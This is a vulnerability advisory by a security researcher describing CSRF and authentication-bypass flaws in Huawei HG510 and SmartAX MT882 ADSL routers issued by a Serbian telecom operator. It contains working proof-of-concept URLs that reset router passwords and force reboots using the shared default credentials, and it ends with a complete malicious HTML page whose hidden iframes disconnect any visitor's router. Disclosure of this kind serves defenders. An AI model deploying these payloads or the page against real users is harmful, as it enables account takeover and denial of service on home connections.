Ivan Marković

Security consultant and researcher

Long experience in designing and implementation of security solutions, mainly oriented on web, mobile and embedded applications. Author of penetration testing tools, recognized by OWASP organization and BackTrack Linux distribution. Researching work includes discovery of vulnerabilities of numeral applications and services, and for these, author received public apreciations by Microsoft Company..

Contact via Linkedin or read interesting staff on Twitter.

Huawei HG510 Security Bypass and Cross-Site Request Forgery Vulnerabilities

Title :  Huawei HG510 Multiple Vulnerabilities
Impact : Authentication bypass, DoS
Type : Local, Remote
Vendor :
- Url : http://www.huawei.com/


|| Description

Huawei HG510 is a device offered by the Serbian telecom operator, to provide ADSL Internet connection.
Administration of settings on this device is allowed only from local LAN network but not only from private IP address (eg 192.168.1.1) then You can access with public IP address.


|| Vulnerability

There is no CSRF protection so we can create malicious web pages and create some CSRF attacks. Is user is logged on his device we can change passwords or some another settings.

.: POC (CSRF)
   http://PUBLIC_IP_OF_USER/password.cgi?sysPassword=BASE64_NEW_PASSWORD

While testing we found one strange behavior with /rebootinfo.cgi (reboot device script).
Normaly for all this CSRF user must be logged into device web interface but if we request:
http://PUBLIC_IP_OF_USER/rebootinfo.cgi, basic authentication is bypassed and device
is rebooted.

So we have CSRF + Authentication Bypass that lead to DoS of end user.

.: POC (CSRF + Auth Bypass => DoS)
   http://PUBLIC_IP_OF_USER/rebootinfo.cgi

   
|| Notice

Serbian telecom operator using the same username/passwords for all clients so malicious users
can use some social engineering or clickjacking for login into web interface and do some CSRF.

.: POC (Login => CSRF)
   http://telekom:telekom@PUBLIC_IP_OF_USER/password.cgi?sysPassword=BASE64_NEW_PASSWORD

Similiar vulnerabilities are founded on another devices that used by Serbian telecom eg:
 
Huawei SmartAX MT882

.: POC (Login => CSRF)
   http://admin:admin@PUBLIC_IP_OF_USER/Action?save_reboot=1&reboot_loc=0&id=5

|| Example of attack with malicious HTML page:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>TELEKOM SRBIJA CSRF DISCONNECT</title>
</head>
<body>
TELEKOM SRBIJA CSRF DISCONNECT
<br />
- Ako koristite TELEKOM ADSL i non-IE browser moguce je da Vas ova stranica otkaci sa mreze ;)
<br />
<br />
<br />
<iframe style="display:none" src="http://<?php echo $_SERVER['REMOTE_ADDR']; ?>/rebootinfo.cgi"></iframe>
<iframe style="display:none" src="http://telekom:telekom@<?php echo $_SERVER['REMOTE_ADDR']; ?>/rebootinfo.cgi"></iframe>
<iframe style="display:none" src="http://<?php echo $_SERVER['REMOTE_ADDR']; ?>/Action?save_reboot=1&reboot_loc=0&id=5"></iframe>
<iframe style="display:none" src="http://admin:admin@<?php echo $_SERVER['REMOTE_ADDR']; ?>/Action?save_reboot=1&reboot_loc=0&id=5"></iframe>
</body>
</html>


|| Contact

Author : Ivan Markovic <ivanm@security-net.biz>

http://www.securityfocus.com/bid/38261/info
https://www.exploit-db.com/exploits/33648/